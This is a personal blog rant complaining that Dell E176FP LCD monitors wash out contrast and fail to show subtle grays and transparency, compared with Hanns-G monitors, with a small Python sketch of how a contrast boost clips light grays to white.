Here is a new picture of an LCD monitor test page viewed on both monitors simultaneously. It very clearly shows the difference, and no, the Dell monitor can't be reconfigured to show the contrast correctly. dell-white.jpg (caution: 4000x3000 pixel resolution).

Now the original blog post follows.

Here's a rant I've been wanting to go on about the Dell E176FP LCD monitors.

These monitors suck!

My college used these monitors everywhere, because they bulk ordered cookie-cutter Dell machines to use as every workstation in every lab on the entire campus. And all of these monitors were just terrible.

I first realized how terrible they are on campus because the brightness on every monitor was set very dark, and this annoyed me. But I couldn't do much about it. Yes, the brightness and contrast were only at 75%, but if I upped those, the screen would become "too" bright -- everything would be white-washed. Subtle changes in gray, such as the status bar on Firefox compared to the white background of a web page, would blend together and there would be no distinguishable separation at all. And, if the Windows machine happened to have the Classic skin, you couldn't tell where the status bars ended and the task bar began.

A white-washed monitor is not usable by any stretch of the imagination.



And then, the monitor I had at my workstation at the office was one of these terrible Dell monitors. Fortunately, I didn't have to deal with it for very long, because all the engineers soon got NVIDIA cards and second monitors, to make us work more efficiently. These new monitors were Hanns-G, 1440x900 pixel LCDs.

I run Linux at my workstation, and with the second monitor, I decided that I'd run a virtual Windows XP machine full-screen in one monitor, and keep the other monitor dedicated to Linux for development. I chose the new Hanns-G monitor to run the Linux half, and the Dell monitor to run the Windows half.

I still kept noticing the color quality differences between the monitors, though. I'd use Windows almost exclusively to test our front-end web product, but every now and then I'd also test it in Linux. On the Hanns-G monitor, the web pages were so bright and colorful compared to how they looked on the Dell monitor. It was like taking off your sunglasses after wearing them for half the day and being amazed how bright the world is.

But this still wasn't too bad.

Some time later, I configured Linux in an interesting way on my laptop, having it run the GNOME desktop environment but use XFCE's window manager. I had all kinds of semi-transparency effects on it, like having the menus be see-through as well as the window decorations. I took a screenshot to send to one of my friends, and I previewed this screenshot in Windows on this crappy Dell monitor, and this is where I officially started to hate this monitor.

The Dell monitor, being SO terrible with color quality, was NOT able to display the transparency in the popup menu there! The menu was probably 10% transparent. Now mind you, this is a screenshot. I wasn't asking the monitor to render semi-transparency. It only had to display what had already been rendered. And it failed!

On the Dell monitor, the menu bar has a solid gray background, not transparent at all. The panel and window borders are still see-through, because I gave them higher transparency levels, but even then the panel looks a bit more milky-white on the Dell monitor.

So, I swapped the monitors; now Linux uses the crappy color-challenged Dell monitor, since I primarily use the Linux half for development in text-based terminals, and the Windows half gets the Hanns-G monitor where I can see everything in full color.

Since the monitor has no effect on the color values the computer actually stores, I couldn't just take a screenshot to show you the difference. So, on the Hanns-G monitor, I opened the screenshot in Photoshop and applied +20 contrast to it, which made it look pretty darn close to the same screenshot viewed on the Dell monitor.
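For the curious, here's a rough sketch of why a contrast boost washes out light grays. This is not Photoshop's actual algorithm (I don't know its formula); it's just a simple linear contrast stretch around mid-gray, and the function name and the example gray value of 236 are made up for illustration.

```python
def adjust_contrast(value, percent):
    """Push an 8-bit channel value away from mid-gray (128), then clip to 0..255.

    Assumption: a plain linear stretch, where +20 means a factor of 1.2.
    """
    factor = 1.0 + percent / 100.0
    scaled = 128 + (value - 128) * factor
    return max(0, min(255, round(scaled)))


# Hypothetical shades: a light-gray status bar next to a pure white page.
status_bar_gray = 236
page_white = 255

# After the boost, both values hit the 255 ceiling and become the same white.
print(adjust_contrast(status_bar_gray, 20), adjust_contrast(page_white, 20))
```

Under this model, any shade lighter than about 234 gets clipped to pure white at +20, which is the same kind of blending-together I saw between status bars and page backgrounds.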

Here are links to the full-size PNG screenshots, so you can see all the differences yourself. Note that if you have such a Dell monitor, and these screenshots look pretty much exactly the same, you're verifying my point. These Dell monitors are crap!

</rant>
